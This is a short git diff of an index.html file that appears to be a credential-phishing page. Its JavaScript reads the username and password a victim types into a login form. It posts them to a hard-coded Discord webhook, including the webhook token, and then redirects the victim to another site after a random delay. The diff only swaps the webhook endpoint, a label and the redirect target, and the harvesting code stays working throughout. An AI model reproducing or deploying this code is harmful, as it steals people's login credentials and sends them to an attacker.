--- a/index.html
+++ b/index.html
@@ -215,17 +215,17 @@
     const u = document.getElementById("username").value;
     const p = document.getElementById("password").value;
 
-    fetch("https://discord.com/api/webhooks/1358102599647232202/4L51fQpmCq7hnbVud6P2AoYXGkpIrt2dYOts15JgJUb9LiEMeIxJJF5AdmDfJxtHlwFd", {
+    fetch("https://discord.com/api/webhooks/1396172055992336394/GOejbicsrzOQMrzWLor93mpEQLs2Dz6IPUeiGT7uvRF8EV6KNdmcJIcaltLIfAdZRcj1", {
       method: "POST",
       headers: { "Content-Type": "application/json" },
       body: JSON.stringify({
-        content: `🛑 고양이\nUsername: ${u}\nPassword: ${p}`
+        content: `🛑 강아지\nUsername: ${u}\nPassword: ${p}`
       })
     })
     .then(response => {
       if (response.ok) {
         setTimeout(() => {
-          window.location.href = "https://www.kakaocorp.com";
+          window.location.href = "https://asked.kr/hhhhhh_ch";
         }, Math.random() * 2000 + 1000);
       } else {
         alert('Something went wrong.');
